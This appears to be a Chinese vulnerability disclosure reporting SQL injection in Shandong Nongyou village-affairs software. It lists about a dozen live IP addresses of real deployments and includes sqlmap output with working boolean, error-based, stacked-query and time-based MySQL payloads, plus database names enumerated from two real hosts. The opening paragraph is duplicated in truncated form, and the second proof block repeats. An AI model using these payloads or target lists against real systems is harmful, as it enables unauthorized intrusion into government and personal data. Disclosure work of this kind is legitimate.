### 简要描述: RT ### 详细说明: 山东农友软件公司官网:http://www.nongyou.com.cn/ 所有参数:tname和 CountryName都存在注入的。 案例如下: http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村 http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村 http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河 http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村 http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区 http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 1.测试注入点:http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 [<img src="https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png) ``` sqlmap identified the following...
### 简要描述: RT ### 详细说明: 山东农友软件公司官网:http://www.nongyou.com.cn/ 所有参数:tname和 CountryName都存在注入的。 案例如下: http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村 http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村 http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河 http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村 http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区 http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 1.测试注入点:http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 [<img src="https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tname=???' AND 3360=3360 AND 'AunX'='AunX&CountryName=???? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=???' AND (SELECT 4079 FROM(SELECT COUNT(*),CONCAT(0x717565737 1,(SELECT (CASE WHEN (4079=4079) THEN 1 ELSE 0 END)),0x716f676a71,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MnDW'='MnDW&Count ryName=???? Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: tname=???'; SELECT SLEEP(5)-- &CountryName=???? Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tname=???' AND SLEEP(5) AND 'nhiY'='nhiY&CountryName=???? --- [16:41:05] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0 [16:41:05] [INFO] fetching database names [16:41:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [16:41:43] [INFO] the SQL query used returns 5503 entries [16:41:43] [INFO] retrieved: information_schema [16:41:45] [INFO] retrieved: commoa [16:41:46] [INFO] retrieved: commoa100001 [16:41:46] [INFO] retrieved: commoa100002 [16:41:47] [INFO] retrieved: commoa100003 [16:41:47] [INFO] retrieved: commoa100004 [16:41:48] [INFO] retrieved: commoa100005 [16:41:48] [INFO] retrieved: commoa100006 [16:41:48] [INFO] retrieved: commoa100007 [16:41:49] [INFO] retrieved: commoa100008 [16:41:49] [INFO] retrieved: commoa100009 [16:41:49] [INFO] retrieved: commoa100010 [16:41:50] [INFO] retrieved: commoa100011 [16:41:50] [INFO] retrieved: commoa100012 [16:41:51] [INFO] retrieved: commoa100013 [16:41:51] [INFO] retrieved: commoa100014 [16:41:51] [INFO] retrieved: commoa100015 [16:41:52] [INFO] retrieved: commoa100016 [16:41:52] [INFO] retrieved: commoa100017 [16:41:52] [INFO] retrieved: commoa100018 [16:41:53] [INFO] retrieved: commoa100019 [16:41:53] [INFO] retrieved: commoa100020 [16:41:55] [INFO] retrieved: commoa100021 [16:41:56] [INFO] retrieved: commoa100022 [16:41:56] [INFO] retrieved: commoa100023 [16:41:57] [INFO] retrieved: commoa100024 [16:41:57] [INFO] retrieved: commoa100025 [16:41:57] [INFO] retrieved: commoa100026 [16:41:58] [INFO] retrieved: commoa100027 [16:41:58] [INFO] retrieved: commoa100028 [16:41:59] [INFO] retrieved: commoa100029 [16:41:59] [INFO] retrieved: commoa100030 [16:41:59] [INFO] retrieved: commoa100031 [16:42:00] [INFO] retrieved: commoa100032 [16:42:00] [INFO] retrieved: commoa100033 [16:42:00] [INFO] retrieved: commoa100034 [16:42:01] [INFO] retrieved: commoa100035 [16:42:01] [INFO] retrieved: commoa100036 [16:42:02] [INFO] retrieved: commoa100037 [16:42:02] [INFO] retrieved: commoa100038 [16:42:02] [INFO] retrieved: commoa100039 [16:42:03] [INFO] retrieved: commoa100040 [16:42:03] [INFO] retrieved: commoa100041 [16:42:04] [INFO] retrieved: commoa100042 [16:42:04] [INFO] retrieved: commoa100043 [16:42:04] [INFO] retrieved: commoa100044 [16:42:05] [INFO] retrieved: commoa100045 [16:42:05] [INFO] retrieved: commoa100046 [16:42:07] [INFO] retrieved: commoa100047 [16:42:08] [INFO] retrieved: commoa100048 [16:42:08] [INFO] retrieved: commoa100049 [16:42:08] [INFO] retrieved: commoa100050 [16:42:09] [INFO] retrieved: commoa100051 [16:42:09] [INFO] retrieved: commoa100052 [16:42:10] [INFO] retrieved: commoa100053 [16:42:10] [INFO] retrieved: commoa100054 [16:42:12] [WARNING] user aborted during enumeration. sqlmap will display partia l output available databases [56]: [*] commoa [*] commoa100001 [*] commoa100002 [*] commoa100003 [*] commoa100004 [*] commoa100005 [*] commoa100006 [*] commoa100007 [*] commoa100008 [*] commoa100009 [*] commoa100010 [*] commoa100011 [*] commoa100012 [*] commoa100013 [*] commoa100014 [*] commoa100015 [*] commoa100016 [*] commoa100017 [*] commoa100018 [*] commoa100019 [*] commoa100020 [*] commoa100021 [*] commoa100022 [*] commoa100023 [*] commoa100024 [*] commoa100025 [*] commoa100026 [*] commoa100027 [*] commoa100028 [*] commoa100029 [*] commoa100030 [*] commoa100031 [*] commoa100032 [*] commoa100033 [*] commoa100034 [*] commoa100035 [*] commoa100036 [*] commoa100037 [*] commoa100038 [*] commoa100039 [*] commoa100040 [*] commoa100041 [*] commoa100042 [*] commoa100043 [*] commoa100044 [*] commoa100045 [*] commoa100046 [*] commoa100047 [*] commoa100048 [*] commoa100049 [*] commoa100050 [*] commoa100051 [*] commoa100052 [*] commoa100053 [*] commoa100054 [*] information_schema ``` 5000多表,没深入的跑了。 我就测试这一个。其他均可复现。 ------------------------------------------------------------------- 第二处注入: http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村 http://222.135.76.147:8200/newSymSum/VillagePersonal3.aspx?tname=港西镇&CountryName=山后鞠家村 http://60.217.72.17:7081/newSymSum/VillagePersonal3.aspx?tname=新市镇&CountryName=王大褂村 http://222.135.109.70:8200/newSymSum/VillagePersonal3.aspx?tname=龙山办事处&CountryName=西楼 http://218.56.40.229:8053/newSymSum/VillagePersonal3.aspx?tname=城港路街道&CountryName=三间房 http://221.2.149.47:8200/newSymSum/VillagePersonal3.aspx?tname=滕家镇&CountryName=曹家沟 1.测试注入点:http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村 [<img src="https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=??? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x71 62797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(R AND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovo g&CountryName=??? Type: stacked queries Title: MySQL < 5.0.12 stacked queries (heavy query) Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &Cou ntryName=??? Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND ' qbiT'='qbiT&CountryName=??? --- [16:47:55] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0 [16:47:55] [INFO] fetching database names [16:47:55] [INFO] the SQL query used returns 17 entries [16:47:55] [INFO] retrieved: information_schema [16:47:55] [INFO] retrieved: cw_databasecomm0517 [16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin [16:47:55] [INFO] retrieved: cw_databasecommxh [16:47:56] [INFO] retrieved: cw_databasezbgx [16:47:56] [INFO] retrieved: cwdbcommzbgx100001 [16:47:56] [INFO] retrieved: cwdbcommzbgx100002 [16:47:56] [INFO] retrieved: cwdbcommzbgx100003 [16:47:56] [INFO] retrieved: cwdbcommzbgx100004 [16:47:56] [INFO] retrieved: cwdbcommzbgx100005 [16:47:56] [INFO] retrieved: cwdbcommzbgx100007 [16:47:56] [INFO] retrieved: mysql [16:47:56] [INFO] retrieved: nl_zbgaoxin [16:47:56] [INFO] retrieved: ny_landgxlz [16:47:56] [INFO] retrieved: test [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu available databases [17]: [*] cw_databasecomm0517 [*] cw_databasecomm22zbgaoxin [*] cw_databasecommxh [*] cw_databasezbgx [*] cwdbcommzbgx100001 [*] cwdbcommzbgx100002 [*] cwdbcommzbgx100003 [*] cwdbcommzbgx100004 [*] cwdbcommzbgx100005 [*] cwdbcommzbgx100007 [*] information_schema [*] mysql [*] nl_zbgaoxin [*] ny_landgxlz [*] test [*] village-levelmajor33zbgaoxin [*] village-levelmajor33zbgaoxinqu ``` 以上均可复现的。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=??? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x71 62797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(R AND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovo g&CountryName=??? Type: stacked queries Title: MySQL < 5.0.12 stacked queries (heavy query) Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &Cou ntryName=??? Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND ' qbiT'='qbiT&CountryName=??? --- [16:47:55] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0 [16:47:55] [INFO] fetching database names [16:47:55] [INFO] the SQL query used returns 17 entries [16:47:55] [INFO] retrieved: information_schema [16:47:55] [INFO] retrieved: cw_databasecomm0517 [16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin [16:47:55] [INFO] retrieved: cw_databasecommxh [16:47:56] [INFO] retrieved: cw_databasezbgx [16:47:56] [INFO] retrieved: cwdbcommzbgx100001 [16:47:56] [INFO] retrieved: cwdbcommzbgx100002 [16:47:56] [INFO] retrieved: cwdbcommzbgx100003 [16:47:56] [INFO] retrieved: cwdbcommzbgx100004 [16:47:56] [INFO] retrieved: cwdbcommzbgx100005 [16:47:56] [INFO] retrieved: cwdbcommzbgx100007 [16:47:56] [INFO] retrieved: mysql [16:47:56] [INFO] retrieved: nl_zbgaoxin [16:47:56] [INFO] retrieved: ny_landgxlz [16:47:56] [INFO] retrieved: test [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu available databases [17]: [*] cw_databasecomm0517 [*] cw_databasecomm22zbgaoxin [*] cw_databasecommxh [*] cw_databasezbgx [*] cwdbcommzbgx100001 [*] cwdbcommzbgx100002 [*] cwdbcommzbgx100003 [*] cwdbcommzbgx100004 [*] cwdbcommzbgx100005 [*] cwdbcommzbgx100007 [*] information_schema [*] mysql [*] nl_zbgaoxin [*] ny_landgxlz [*] test [*] village-levelmajor33zbgaoxin [*] village-levelmajor33zbgaoxinqu ```